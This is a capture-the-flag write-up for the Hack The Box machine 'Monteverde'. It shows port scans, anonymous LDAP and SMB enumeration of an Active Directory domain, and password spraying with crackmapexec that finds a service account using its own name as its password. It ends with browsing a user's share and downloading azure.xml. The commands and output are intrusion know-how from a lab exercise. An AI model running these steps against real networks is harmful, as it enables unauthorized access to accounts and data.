Monteverde
Completed on 14 Jan 2020.
Last updated
Was this helpful?
Completed on 14 Jan 2020.
Last updated
Was this helpful?
This Hack The Box machine is built on Windows operating system and revolves around Active Directory, LDAP, and misconfigurations. The surprise of this machine was seeing Azure involved; quite interesting.
Some great resources around this are below:
First of, we need to identify how to reach the system. In other words, we need to identify what are the services available from this machine.
Let's start by adding this machine's IP address to the hosts file and create an alias:
root@kali:~/Documents/HTB-Labs/Monteverde# echo "10.10.10.172 monteverde.htb" >> /etc/hostsMy go-to tools in this phase, which are typically used by many to start enumerating, are:
masscan: very nice port scanning tool that allows finding open ports quickly. To me this is a tool to narrow down the scope of the enumeration so we can focus on open ports only when using nmap.
Here, I am designating the interface to use when communicating to the HTB machine (-e) which will be the HTB VPN interface, along with -p to designate the port range to target but I will target ALL TCP and UDP Ports, and the transmission rate of packets per second (--rate).
Similar to this, you could also run something like this:
nmap -p- --min-rate=1000 -T4
nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile Port scanning tool which also allows you to use scripts to further target the services found. Just like anything, it can be a useful tool while it can also be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: to use all default non-intrusive nmap scripts on each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvv: for extended verbosity (as I like as many details as I can get)user@kali:~/Documents/HTB-Labs/Monteverde$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.172 --rate=1000 | tee Monteverde_masscan.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-11 19:07:09 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 49670/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 464/tcp on 10.10.10.172
Discovered open port 593/tcp on 10.10.10.172
Discovered open port 636/tcp on 10.10.10.172
Discovered open port 5985/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 49673/tcp on 10.10.10.172
Discovered open port 49702/tcp on 10.10.10.172
Discovered open port 3269/tcp on 10.10.10.172
Discovered open port 49669/tcp on 10.10.10.172
Discovered open port 49776/tcp on 10.10.10.172
Discovered open port 139/tcp on 10.10.10.172
Discovered open port 3268/tcp on 10.10.10.172
Discovered open port 135/tcp on 10.10.10.172
Discovered open port 445/tcp on 10.10.10.172
Discovered open port 9389/tcp on 10.10.10.172
Discovered open port 49667/tcp on 10.10.10.172Now, we can use the output saved in the log file to store the ports in a variable and make ours lives easier:
user@kali:~/Documents/HTB-Labs/Monteverde$ PORTS=$(cat Monteverde_masscan.log | grep Discovered | cut -d" " -f4 | cut -d"/" -f1 | sort | xargs | tr " " ",")By doing this, we can simply call this variable when performing our port scan.
user@kali:~/Documents/HTB-Labs/Monteverde$ nmap -sC -sV -vvv -p $PORTS monteverde.htb -oX Monteverde_TCP.xml -oN Monteverde_TCP.log
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 22:30 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
Initiating Ping Scan at 22:30
Scanning monteverde.htb (10.10.10.172) [4 ports]
Completed Ping Scan at 22:30, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:30
Scanning monteverde.htb (10.10.10.172) [13 ports]
Discovered open port 135/tcp on 10.10.10.172
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 445/tcp on 10.10.10.172
Discovered open port 593/tcp on 10.10.10.172
Discovered open port 139/tcp on 10.10.10.172
Discovered open port 3268/tcp on 10.10.10.172
Discovered open port 9389/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 5985/tcp on 10.10.10.172
Discovered open port 636/tcp on 10.10.10.172
Discovered open port 3269/tcp on 10.10.10.172
Discovered open port 464/tcp on 10.10.10.172
Completed SYN Stealth Scan at 22:30, 0.33s elapsed (13 total ports)
Initiating Service scan at 22:30
Scanning 13 services on monteverde.htb (10.10.10.172)
Completed Service scan at 22:33, 149.13s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.10.172.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:33
NSE Timing: About 99.94% done; ETC: 22:33 (0:00:00 remaining)
Completed NSE at 22:33, 40.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:33
NSE Timing: About 95.19% done; ETC: 22:34 (0:00:02 remaining)
NSE Timing: About 97.12% done; ETC: 22:34 (0:00:02 remaining)
NSE Timing: About 98.08% done; ETC: 22:35 (0:00:02 remaining)
NSE Timing: About 99.04% done; ETC: 22:35 (0:00:01 remaining)
Completed NSE at 22:35, 120.82s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2020-01-11 22:30:39 EST for 311s
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-12 03:40:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/11%Time=5E1A92EB%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 9m25s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48049/tcp): CLEAN (Timeout)
| Check 2 (port 2859/tcp): CLEAN (Timeout)
| Check 3 (port 47166/udp): CLEAN (Timeout)
| Check 4 (port 50283/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-12T03:42:37
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 311.09 seconds
Raw packets sent: 17 (724B) | Rcvd: 14 (600B)As you can see from the open ports found, we have the following which are very important:
-> Kerberos: 88/tcp Microsoft Windows Kerberos
-> DNS: 53/tcp
-> MSRPC: 135/tcp open Microsoft Windows RPC
-> NetBios: 139/tcp open Microsoft Windows netbios-ssn
-> LDAP: 389/tcp Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
-> SMB: 445/tcp
-> LDAPS: 636/tcp
-> Windows Remote Management (WinRM): 5985/tcp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)Some of these ports are typical of Active Directory environments, but not all can be targeted.
For instance, TCP 445 would reveal more information if some conditions were applicable for the port scan to access it, the fact that no other information was returned means that it shouldn't be our first attempt.
MSRPC and Netbios can return some information, but we won't target them directly. LDAP on the other hand, return domain related information or basically the domain FQDN, which means it could be possible to target through a null session.
Below, I will provide a truncated output as it is too massive to provide, along with the the syntax to use.
user@kali:~/Documents/HTB-Labs/Monteverde$ ldapsearch -x -h monteverde.htb -b "dc=megabank,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=megabank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
.
.
.
# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 271
# numEntries: 267
# numReferences: 3To get a more friendly enumeration, let's use enum4linux through a null session using MEGABANK as the Netbios domain name:
user@kali:~/Documents/HTB-Labs/Monteverde$ enum4linux -w MEGABANK -a monteverde.htb | tee Monteverde_enum4linux.log
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 20:10:58 2020
==========================
| Target Information |
==========================
Target ........... monteverde.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on monteverde.htb |
======================================================
[+] Got domain/workgroup name: MEGABANK
==============================================
| Nbtstat Information for monteverde.htb |
==============================================
Looking up status of 10.10.10.172
No reply from 10.10.10.172
=======================================
| Session Check on monteverde.htb |
=======================================
[+] Server monteverde.htb allows sessions using username '', password ''
=============================================
| Getting domain SID for monteverde.htb |
=============================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)
========================================
| OS information on monteverde.htb |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for monteverde.htb from smbclient:
[+] Got OS info for monteverde.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
===============================
| Users on monteverde.htb |
===============================
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
===========================================
| Share Enumeration on monteverde.htb |
===========================================
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on monteverde.htb
======================================================
| Password Policy Information for monteverde.htb |
======================================================
[+] Attaching to monteverde.htb using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] MEGABANK
[+] Builtin
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
================================
| Groups on monteverde.htb |
================================
[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
group:[ADSyncAdmins] rid:[0x451]
group:[ADSyncOperators] rid:[0x452]
group:[ADSyncBrowse] rid:[0x453]
group:[ADSyncPasswordSet] rid:[0x454]
[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
[+] Getting domain group memberships:
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
=========================================================================
| Users on monteverde.htb via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================================
| Getting printer info for monteverde.htb |
===============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Jan 12 20:18:11 2020Thanks to enum4linux, we got now a lot of valuable information that is not just related to the users, but critical group membership. Some of these users and groups are related to Azure.
Along with the Azure Directory Sync group and others, we have a MS SQL related group. Let gather a list of users and test for potential user and password combinations.
user@kali:~/Documents/HTB-Labs/Monteverde$ cat Monteverde_enum4linux.log | grep "user:" | cut -d":" -f2 | cut -d"[" -f2 | cut -d"]" -f1
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
user@kali:~/Documents/HTB-Labs/Monteverde$ cat Monteverde_enum4linux.log | grep "has member" | grep "MEGABANK" | grep "Admins" | cut -d":" -f3 | cut -d"\\" -f2
Administrator
AAD_987d7f2f57d2
mhopeNow, we can try using the lazy password approach, including usernames as passwords, and perform password spraying.
user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec -u Monteverde_userList.txt -p passwdLazy.txt --shares monteverde.htb
CME monteverde.htb:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-ata:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-ata:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-ata:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-bexec:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-bexec:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-bexec:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-netapp:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-netapp:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-netapp:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\dgalanos:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\dgalanos:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\dgalanos:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\roleary:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\roleary:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\roleary:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\smorgan:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\smorgan:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\smorgan:1234567 STATUS_LOGON_FAILURE
user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec monteverde.htb -u Monteverde_userList.txt -p Monteverde_userList.txt
CME monteverde.htb:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:SABatchJobs STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:svc-ata STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:svc-bexec STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:svc-netapp STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:dgalanos STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:roleary STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:smorgan STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:svc-bexec STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:SABatchJobs STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:svc-ata STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:svc-bexec STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:svc-netapp STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:dgalanos STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:roleary STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:smorgan STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJobs
[*] KTHXBYE!Looks like the approach was correct even though the first attempt failed.
As it turns out, the service account SABatchJobs was used as its own password when created; the lazy administrator approach.
Let's try and validate the access this account has:
user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec monteverde.htb -u SABatchJobs -p SABatchJobs --shares
CME monteverde.htb:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME monteverde.htb:445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJobs
CME monteverde.htb:445 MONTEVERDE [+] Enumerating shares
CME monteverde.htb:445 MONTEVERDE SHARE Permissions
CME monteverde.htb:445 MONTEVERDE ----- -----------
CME monteverde.htb:445 MONTEVERDE users$ READ
CME monteverde.htb:445 MONTEVERDE ADMIN$ NO ACCESS
CME monteverde.htb:445 MONTEVERDE IPC$ READ
CME monteverde.htb:445 MONTEVERDE azure_uploads READ
CME monteverde.htb:445 MONTEVERDE E$ NO ACCESS
CME monteverde.htb:445 MONTEVERDE SYSVOL READ
CME monteverde.htb:445 MONTEVERDE C$ NO ACCESS
CME monteverde.htb:445 MONTEVERDE NETLOGON READ
[*] KTHXBYE!This last attempt basically tell us we can go through each of the shares we have read access with SABatchJobs.
Another way could've been by using smbmap:
user@kali:~/Documents/HTB-Labs/Monteverde$ smbmap -H monteverde.htb -u SABatchJobs -p SABatchJobs -d MEGABANK
[+] IP: monteverde.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
At this point, we can try accessing these shares:
user@kali:~/Documents/HTB-Labs/Monteverde$ impacket-smbclient MEGABANK/SABatchJobs:SABatchJobs@monteverde.htb
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# use users$
# ls
drw-rw-rw- 0 Fri Jan 3 08:12:48 2020 .
drw-rw-rw- 0 Fri Jan 3 08:12:48 2020 ..
drw-rw-rw- 0 Fri Jan 3 08:15:23 2020 dgalanos
drw-rw-rw- 0 Fri Jan 3 08:41:18 2020 mhope
drw-rw-rw- 0 Fri Jan 3 08:14:56 2020 roleary
drw-rw-rw- 0 Fri Jan 3 08:14:28 2020 smorgan
# cd mhope
# ls
drw-rw-rw- 0 Fri Jan 3 08:41:18 2020 .
drw-rw-rw- 0 Fri Jan 3 08:41:18 2020 ..
-rw-rw-rw- 1212 Fri Jan 3 09:59:24 2020 azure.xml
# get azure.xml
# cd ../roleary
# ls
drw-rw-rw- 0 Fri Jan 3 08:14:56 2020 .
drw-rw-rw- 0 Fri Jan 3 08:14:56 2020 ..
# cd ../smorgan
# ls
